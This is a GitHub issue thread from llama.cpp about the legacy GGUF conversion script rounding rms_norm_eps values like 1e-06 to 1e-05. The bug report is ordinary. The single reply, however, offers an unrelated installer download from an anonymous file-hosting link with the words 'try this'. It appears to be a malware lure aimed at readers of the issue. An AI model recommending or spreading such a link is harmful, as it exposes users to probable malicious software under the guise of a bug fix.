### ISSUE TITLE
Bug: Conversion to GGUF format alters rms_norm_eps precision to 1e-05 for all values

### ISSUE THREAD

**Issue by zsq0216** [ggerganov/llama.cpp#9310]
### What happened?

When converting models to GGUF format using `examples/convert_legacy_llama.py`, the original `rms_norm_eps` values in the model configuration (such as `1e-06` or `1e-07`) are changed to `1e-05` after conversion.

**What I expect to happen:**
The `rms_norm_eps` values should remain unchanged during the conversion process, preserving the original precision (e.g., `1e-06 `or `1e-07`) in the GGUF format to ensure consistency with the initial model configuration.

### Name and Version

./llama-cli --version
version: 3511 (https://github.com/ggerganov/llama.cpp/commit/0d6fb52be0c1b7e77eb855f3adc4952771c8ce4c)
built with cc (Ubuntu 12.3.0-1ubuntu1~22.04) 12.3.0 for x86_64-linux-gnu

**Comment by GenaroSalomone** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer
